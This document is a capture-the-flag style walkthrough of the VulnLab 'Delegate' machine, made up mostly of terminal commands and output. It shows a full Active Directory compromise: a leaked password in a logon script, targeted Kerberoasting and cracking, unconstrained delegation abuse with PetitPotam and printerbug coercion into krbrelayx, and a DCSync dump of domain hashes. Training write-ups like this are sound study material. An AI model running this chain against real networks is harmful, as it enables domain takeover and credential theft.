vulnlab-delegate
a hard machine
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ impacket-lookupsid guest@delegate.vl 10000 Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password: [*] Brute forcing SIDs at delegate.vl [*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120 498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: DELEGATE\Administrator (SidTypeUser) 501: DELEGATE\Guest (SidTypeUser) 502: DELEGATE\krbtgt (SidTypeUser) 512: DELEGATE\Domain Admins (SidTypeGroup) 513: DELEGATE\Domain Users (SidTypeGroup) 514: DELEGATE\Domain Guests (SidTypeGroup) 515: DELEGATE\Domain Computers (SidTypeGroup) 516: DELEGATE\Domain Controllers (SidTypeGroup) 517: DELEGATE\Cert Publishers (SidTypeAlias) 518: DELEGATE\Schema Admins (SidTypeGroup) 519: DELEGATE\Enterprise Admins (SidTypeGroup) 520: DELEGATE\Group Policy Creator Owners (SidTypeGroup) 521: DELEGATE\Read-only Domain Controllers (SidTypeGroup) 522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup) 525: DELEGATE\Protected Users (SidTypeGroup) 526: DELEGATE\Key Admins (SidTypeGroup) 527: DELEGATE\Enterprise Key Admins (SidTypeGroup) 553: DELEGATE\RAS and IAS Servers (SidTypeAlias) 571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias) 572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias) 1000: DELEGATE\DC1$ (SidTypeUser) 1101: DELEGATE\DnsAdmins (SidTypeAlias) 1102: DELEGATE\DnsUpdateProxy (SidTypeGroup) 1104: DELEGATE\A.Briggs (SidTypeUser) 1105: DELEGATE\b.Brown (SidTypeUser) 1106: DELEGATE\R.Cooper (SidTypeUser) 1107: DELEGATE\J.Roberts (SidTypeUser) 1108: DELEGATE\N.Thompson (SidTypeUser) 1121: DELEGATE\delegation admins (SidTypeGroup)
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Password: [-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] invalid principal syntax
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ smbclient //delegate.vl/SYSVOL -U puck Password for [WORKGROUP\puck]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Sep 9 09:52:30 2023 .. D 0 Sat Aug 26 05:39:25 2023 delegate.vl Dr 0 Sat Aug 26 05:39:25 2023 5242879 blocks of size 4096. 1960185 blocks available smb: \> cd delegate.vl\ smb: \delegate.vl\> ls . D 0 Sat Aug 26 05:45:45 2023 .. D 0 Sat Aug 26 05:39:25 2023 DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023 Policies D 0 Sat Aug 26 05:39:30 2023 scripts D 0 Sat Aug 26 08:45:24 2023 5242879 blocks of size 4096. 1960185 blocks available smb: \delegate.vl\> cd scripts smb: \delegate.vl\scripts\> ls . D 0 Sat Aug 26 08:45:24 2023 .. D 0 Sat Aug 26 05:45:45 2023 users.bat A 159 Sat Aug 26 08:54:29 2023 5242879 blocks of size 4096. 1960182 blocks available smb: \delegate.vl\scripts\> get users.bat getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec) smb: \delegate.vl\scripts\> ┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ cat users.bat rem @echo off net use * /delete /y net use v: \\dc1\development if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
Bloodhound to get more info
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169 INFO: Found AD domain: delegate.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: dc1.delegate.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc1.delegate.vl INFO: Found 9 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC1.delegate.vl INFO: Done in 00M 07S
Upload data to Bloodhound, we find
The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user
A targeted kerberoast attack can be performed using targetedKerberoast.py.
targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ cd targetedKerberoast ┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ ls kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py ┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ python3 -m venv venv ┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ ls kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv ┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ source venv/bin/activate ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ pip3 install -r requirements.txt Collecting ldap3 (from -r requirements.txt (line 1)) Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB) --snip--- Using cached pycparser-2.22-py3-none-any.whl (117 kB) Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0 ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl' [*] Starting kerberoast attacks [*] Attacking user (N.Thompson) [+] Printing hash for (N.Thompson) $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast] └─$ ....
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status KALEB_2341 (?) 1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427 Use the "--show" option to display all of the cracked passwords reliably Session completed.
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341 MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10
.
a new tool ( dnstool , printerbug )
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ git clone https://github.com/dirkjanm/krbrelayx.git Cloning into 'krbrelayx'... remote: Enumerating objects: 202, done. remote: Counting objects: 100% (51/51), done. remote: Compressing objects: 100% (24/24), done. remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151 Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done. Resolving deltas: 100% (109/109), done. ┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ cd krbrelayx ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 -m venv venv ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ source venv/bin/activate ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ ls addspn.py dnstool.py krbrelayx.py lib LICENSE printerbug.py README.md venv ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 -m pip3 install impacket /home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3 ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ pip3 install impacket Collecting impacket Using cached impacket-0.11.0-py3-none-any.whl --snip-- Using cached pycparser-2.22-py3-none-any.whl (117 kB) Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
.
new tools ( bloodyad.py , addspn.py & PetitPotam.py)
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ ls addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 -m venv venv ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ source venv/bin/activate ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ cd bloodyAD ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ ls bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION [-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ cd .. ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found modification target [+] SPN Modified successfully ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl [-] Connecting to host... [-] Binding to host [+] Bind OK [+] Found modification target [+] SPN Modified successfully ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ ls addspn.py bloodyAD dnstool.py krbrelayx.py lib LICENSE PetitPotam printerbug.py README.md venv ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ cd PetitPotam ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam] └─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86 ___ _ _ _ ___ _ | _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __ | _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \ _|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_| _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN Trying pipe lsarpc [-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc] [+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! [-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED! [+] OK! Using unpatched function! [-] Sending EfsRpcEncryptFileSrv! [+] Got expected ERROR_BAD_NETPATH exception!! [+] Attack worked! ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam] └─$
Below the bloodyAD installed in Python Virtual Enviroment ( i had troubles with dependicies)
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ git clone https://github.com/CravateRouge/bloodyAD.git Cloning into 'bloodyAD'... remote: Enumerating objects: 1123, done. remote: Counting objects: 100% (495/495), done. remote: Compressing objects: 100% (274/274), done. remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628 Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done. Resolving deltas: 100% (681/681), done. ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ cd bloodyAD ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ ls bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION Traceback (most recent call last): File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module> from bloodyAD import main File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module> from .network.config import Config, ConnectionHandler File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module> from bloodyAD.network.ldap import Ldap File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module> from msldap.client import MSLDAPClient ModuleNotFoundError: No module named 'msldap' ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ ls bloodyAD bloodyAD.py LICENSE pyproject.toml README.md requirements.txt tests ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ pip3 install -r requirements.txt Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD Installing build dependencies ... done Getting requirements to build wheel ... done Preparing metadata (pyproject.toml) ... done Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1)) --snip-- Successfully built bloodyAD Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9 ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION [-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD] └─$
.
.
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ cd krbrelayx ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only. [*] Running in unconstrained delegation abuse mode using the specified credentials. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up DNS Server [*] Servers started, waiting for connections [*] SMBD: Received connection from 10.10.81.86 [*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL] [*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache [*] SMBD: Received connection from 10.10.81.86 [*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL] [*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Using powermad & printerbug
┌──(puck㉿kali)-[~/vulnhub/delegate] └─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1 Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1 Data: 180768 bytes of 180768 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1 *Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force) [+] Machine account PWNED added *Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384 [+] Machine account pwned attribute useraccountcontrol updated *Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append [+] Machine account pwned attribute ServicePrincipalName appended *Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose Verbose: [+] Domain Controller = DC1.delegate.vl Verbose: [+] Domain = delegate.vl Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl HTTP/PWNED.delegate.vl RestrictedKrbHost/PWNED HOST/PWNED RestrictedKrbHost/PWNED.delegate.vl HOST/PWNED.delegate.vl *Evil-WinRM* PS C:\Users\N.Thompson\Documents>
setup the listener ( waiting for connection then)
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only. [*] Running in unconstrained delegation abuse mode using the specified credentials. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up DNS Server [*] Servers started, waiting for connections [*] SMBD: Received connection from 10.10.105.77 [*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL] [*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache [*] SMBD: Received connection from 10.10.105.77 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] SMBD: Received connection from 10.10.105.77 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
start printerbug
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ ls addspn.py 'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' krbrelayx.py LICENSE printerbug.py venv bloodyAD dnstool.py lib PetitPotam README.md ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl [*] Impacket v0.11.0 - Copyright 2023 Fortra Password:12345 [*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl [*] Bind OK [*] Got handle DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Triggered RPC backconnect, this may or may not have worked ┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
use impacket-secrectsdump to get the hashes.
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ klist Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache Default principal: DC1$@DELEGATE.VL Valid starting Expires Service principal 06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL renew until 06/19/2024 07:07:36 ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx] └─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2::: A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3::: b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6::: R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1::: J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f::: N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe::: DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e::: PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f::: [*] Cleaning up... ┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
.
What a ride.